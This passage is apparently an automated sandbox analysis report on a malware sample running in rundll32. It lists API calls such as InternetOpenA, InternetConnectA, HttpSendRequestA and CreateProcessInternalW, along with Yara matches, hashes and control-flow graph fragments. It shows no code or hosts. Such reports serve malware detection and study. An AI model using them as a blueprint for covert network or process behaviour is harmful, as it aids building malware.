                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 2dafcda1522b7a6d1f6016ab091a0d50b015526066d41cc003d732d4ca66389e
                                                                                                                          • Instruction ID: baa863b25028cfb21c1f2f93279d455caa0223871067a0c22169ada4f491b718
                                                                                                                          • Opcode Fuzzy Hash: 2dafcda1522b7a6d1f6016ab091a0d50b015526066d41cc003d732d4ca66389e
                                                                                                                          • Instruction Fuzzy Hash: E190023520604843F54471584504BC6001987D0349F51E415A18596D4DD635DD55B6A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: a24722ff5c7be9ade63b597acaba91ba9c80f658f419a230bf807cf711ae5128
                                                                                                                          • Instruction ID: cd6bc7ded5aae1963c03fd51d336fb44d5860b10505f0596859aa3e4658a7f4c
                                                                                                                          • Opcode Fuzzy Hash: a24722ff5c7be9ade63b597acaba91ba9c80f658f419a230bf807cf711ae5128
                                                                                                                          • Instruction Fuzzy Hash: 2C90023520208803F514715885047CA000987D0345F55E815A5C19698DC6A5D8917161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 67412830921be99977c8c02b0f348852f7dcdb07692f572b6c7eed86d5fe2a4d
                                                                                                                          • Instruction ID: ed28cc362e200a3c01d5d85404e7af0e7c4ffff89ec3ba538c9595f773eec570
                                                                                                                          • Opcode Fuzzy Hash: 67412830921be99977c8c02b0f348852f7dcdb07692f572b6c7eed86d5fe2a4d
                                                                                                                          • Instruction Fuzzy Hash: 2E90023520200843F50471584504BC6000987E0345F51E41AA1919694DC625D8517561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: a965c5d23ca81197349f180450e8a3f8e2ddac25ef007718c02e55f1fbfcb923
                                                                                                                          • Instruction ID: 3155a17b84d3eb6c24cc45a7a7a41c8ab97d9251123471fdbe17db82647f0edc
                                                                                                                          • Opcode Fuzzy Hash: a965c5d23ca81197349f180450e8a3f8e2ddac25ef007718c02e55f1fbfcb923
                                                                                                                          • Instruction Fuzzy Hash: E690023520200403F504759855087C6000987E0345F51F415A6819595EC675D8917171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 601 418d70-418db6 call 419290 604 418dd3-418dd9 601->604 605 418db8-418dd2 HttpSendRequestA 601->605
                                                                                                                          APIs
                                                                                                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00418DCC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: HttpRequestSend
                                                                                                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                                          • API String ID: 360639707-2503632690
                                                                                                                          • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                                                          • Instruction ID: 4f936be155798faaa0b2a9e2e909207ed3ac3c7b80bb7ae58ddfac945b2fba80
                                                                                                                          • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                                                          • Instruction Fuzzy Hash: 18014BB2905219AFCB04DF98D841AEFBBB8EB58210F108189FD08A7304D670EE10CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 606 418c70-418cb6 call 419290 609 418cb8-418cde InternetConnectA 606->609 610 418cdf-418ce5 606->610
                                                                                                                          APIs
                                                                                                                          • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00418CD8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ConnectInternet
                                                                                                                          • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                                          • API String ID: 3050416762-1024195942
                                                                                                                          • Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                                                          • Instruction ID: 54fcc15e06e19dd10cd9518ef0310ce6ca8bbd195a027a2556502f1bfe8910d7
                                                                                                                          • Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                                                          • Instruction Fuzzy Hash: 8E01E9B2915119AFCB14DF99D941EEF77B8EB48314F154289FE08A7241D634EE10CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 650 418c00-418c2f 651 418c3a-418c41 650->651 652 418c35 call 419290 650->652 653 418c43-418c5d InternetOpenA 651->653 654 418c5e-418c64 651->654 652->651
                                                                                                                          APIs
                                                                                                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00418C57
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InternetOpen
                                                                                                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                          • API String ID: 2038078732-3155091674
                                                                                                                          • Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                                                          • Instruction ID: a0f79bcc74c24749c030f5f4821d4f6029ea6111142c2d96cfa58afdff09fbce
                                                                                                                          • Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                                                          • Instruction Fuzzy Hash: 78F0F6B2A01128AF9B14DF99D8419EBB7B8EB48310B04858EBE1897201D635AE508BE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 655 418bf8-418c41 call 419290 659 418c43-418c5d InternetOpenA 655->659 660 418c5e-418c64 655->660
                                                                                                                          APIs
                                                                                                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00418C57
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InternetOpen
                                                                                                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                          • API String ID: 2038078732-3155091674
                                                                                                                          • Opcode ID: b3abdee364784b4e8809aabd4f4d60a8d1c0cb5efe5e0280e3e0dbccb7aa2cac
                                                                                                                          • Instruction ID: 74db2d65b42f6a31a1807804714bd7cdbe49c7c2b9f887d6caf84b8a808a69c7
                                                                                                                          • Opcode Fuzzy Hash: b3abdee364784b4e8809aabd4f4d60a8d1c0cb5efe5e0280e3e0dbccb7aa2cac
                                                                                                                          • Instruction Fuzzy Hash: 0601FBB1901129AF8B14DF99D8459EB7BB8FF48310B04858DFE189B201D635EA50CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00418E9F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleInternet
                                                                                                                          • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                                          • API String ID: 1081599783-4067651292
                                                                                                                          • Opcode ID: da84efcd08f44eff9cc2e4df866adb6372bc8fde6d7ab5fa548fe9ab716c1e8e
                                                                                                                          • Instruction ID: 46c68265ec712a20baca453a1e9300044e6b2aa79663cd95011a7d7191c7cb81
                                                                                                                          • Opcode Fuzzy Hash: da84efcd08f44eff9cc2e4df866adb6372bc8fde6d7ab5fa548fe9ab716c1e8e
                                                                                                                          • Instruction Fuzzy Hash: 21F06272C11228AB8B00DFD9D9419EA7B78EB85310F114589ED08AB201D6749B00CBD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00418E9F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleInternet
                                                                                                                          • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                                          • API String ID: 1081599783-4067651292
                                                                                                                          • Opcode ID: 5dbf4104c698586ebdf7b707d1bf2520d912350f86961b26068399d97cf18735
                                                                                                                          • Instruction ID: 3bba89c094966dca0bad3af9027282bf5e064592af05f17a3593051ab27f52aa
                                                                                                                          • Opcode Fuzzy Hash: 5dbf4104c698586ebdf7b707d1bf2520d912350f86961b26068399d97cf18735
                                                                                                                          • Instruction Fuzzy Hash: 4DF03072D05228AF8B10DFD9D9459EFBBB8EB45310F108589ED48AB201D6709B10CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00418E9F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleInternet
                                                                                                                          • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                                          • API String ID: 1081599783-4067651292
                                                                                                                          • Opcode ID: 599ad50ad9df8bf00b0f676a2076f7703efbd109d238da0eb0393eb4a4cf26ec
                                                                                                                          • Instruction ID: 5c613cbd2282e9b4a36b2b8bf5a70c6b53e3d65224fe780f976acd854932d3cf
                                                                                                                          • Opcode Fuzzy Hash: 599ad50ad9df8bf00b0f676a2076f7703efbd109d238da0eb0393eb4a4cf26ec
                                                                                                                          • Instruction Fuzzy Hash: 7CF01CB1C05268AB8B11DFDA99056EABBB4EB41710B148A8EEA487B201D6745B018BA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                          • Opcode ID: 5c038c109a318ea23aad09a44560aa23916a15417a602348ff7e9a32929f47a4
                                                                                                                          • Instruction ID: b66ed6e082027d42ae5b2b6675ce4a2daf228ce1d32695697f2b26fa5db8665f
                                                                                                                          • Opcode Fuzzy Hash: 5c038c109a318ea23aad09a44560aa23916a15417a602348ff7e9a32929f47a4
                                                                                                                          • Instruction Fuzzy Hash: 9731B2B6505704ABC711DF65C8A1FA7B7B8BF48704F00811EFA199B241D734B485CBA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                          • Opcode ID: 0b8ba3633e0180b8872c9b6a792d714606eb393f53b604bd2bc7ad69db50ab50
                                                                                                                          • Instruction ID: 2504db3e1eb65449d4b793a92dd7d7b0147c6d3321c3c8ba692f00a9e85749a6
                                                                                                                          • Opcode Fuzzy Hash: 0b8ba3633e0180b8872c9b6a792d714606eb393f53b604bd2bc7ad69db50ab50
                                                                                                                          • Instruction Fuzzy Hash: 1021D6B1505304ABC710DF69C8A1FABBBB4FF48704F00812EFA199B242D774A495CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403B93), ref: 0041891D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          • Opcode ID: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
                                                                                                                          • Instruction ID: 254ebd78c134e86961edc2b83238041f98d8b30b9d575ea6a8a1165c1b86d8df
                                                                                                                          • Opcode Fuzzy Hash: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
                                                                                                                          • Instruction Fuzzy Hash: 7DF06DB1200218ABEB18DFA8DC49EEB37A8EF84790F118599FD485B241C631E914CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403B93), ref: 0041891D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                          • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                                                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                          • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00000000,?), ref: 004188DD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: 65A
                                                                                                                          • API String ID: 1279760036-2085483392
                                                                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                                                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CoInitialize.OLE32(00000000,00000000,00403AC6,00000000), ref: 00411777
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID: @J7<
                                                                                                                          • API String ID: 2538663250-2016760708
                                                                                                                          • Opcode ID: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
                                                                                                                          • Instruction ID: f3e6d472f992f1f590b6b70f0584e266d92e33c6be755c55e2db4f12b6075795
                                                                                                                          • Opcode Fuzzy Hash: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
                                                                                                                          • Instruction Fuzzy Hash: 24311EB5A0020AAFDB00DFD8D8809EFB7B9BF88304B108559E515AB214D775EE45CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CoInitialize.OLE32(00000000,00000000,00403AC6,00000000), ref: 00411777
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID: @J7<
                                                                                                                          • API String ID: 2538663250-2016760708
                                                                                                                          • Opcode ID: b6a0e72435744ef3055ad4891f0d00ddc2d3dfed23193298c0d6e5199d10fa52
                                                                                                                          • Instruction ID: 5749db0eb7fcbb07965c2f41df2ef49ff0e8166f3e4ea925c17c58d6b4ca49a4
                                                                                                                          • Opcode Fuzzy Hash: b6a0e72435744ef3055ad4891f0d00ddc2d3dfed23193298c0d6e5199d10fa52
                                                                                                                          • Instruction Fuzzy Hash: 14311EB6A0020A9FDB00DFD8D8809EFB7BAFF88304B108559E515AB214D775AE45CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004072DA
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004072FB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: f60e6dafd3e4c00e414ad486381866e2c845adc504c79fb64907f785a6f5e4a7
                                                                                                                          • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                                                                                                          • Opcode Fuzzy Hash: f60e6dafd3e4c00e414ad486381866e2c845adc504c79fb64907f785a6f5e4a7
                                                                                                                          • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004189B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2186235152-0
                                                                                                                          • Opcode ID: 558c73087d880e6b38b06aeba6b12e23934193b87adee1dac964df1075fddadc
                                                                                                                          • Instruction ID: 7fb613767383ea78da229ef5f7838ece650e27511afb5653b3193ac43ac23667
                                                                                                                          • Opcode Fuzzy Hash: 558c73087d880e6b38b06aeba6b12e23934193b87adee1dac964df1075fddadc
                                                                                                                          • Instruction Fuzzy Hash: 5911F3B2200209AFCB14DF89DC91EEB73ADEF8C754F108659FA0D97240C630E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                                                          • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                                                                                                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                                                          • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004189B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2186235152-0
                                                                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                          • Instruction ID: 1af0cfd0e6c2e5daaf689e3a1adcdb327afdc4aaeaa6b63ab644a3d9e900bb8f
                                                                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                          • Instruction Fuzzy Hash: 1401AFB2214108BBCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
                                                                                                                          • Instruction ID: ef1be6ec95822bbbb8ab02b4b335b7cd8bb34784a89431e09f03391bbe651767
                                                                                                                          • Opcode Fuzzy Hash: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
                                                                                                                          • Instruction Fuzzy Hash: D1F0C875E0010DABCF10DAD4E842FDDB378AB14318F0081A6ED1CAB281F574AB458B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040CCF0,?,?), ref: 0041746C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2422867632-0
                                                                                                                          • Opcode ID: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                                                                                                                          • Instruction ID: 4bfac2df6ef5ebeeccdb4a327c9500ed522813dad8df6d918b149b18c006a7b7
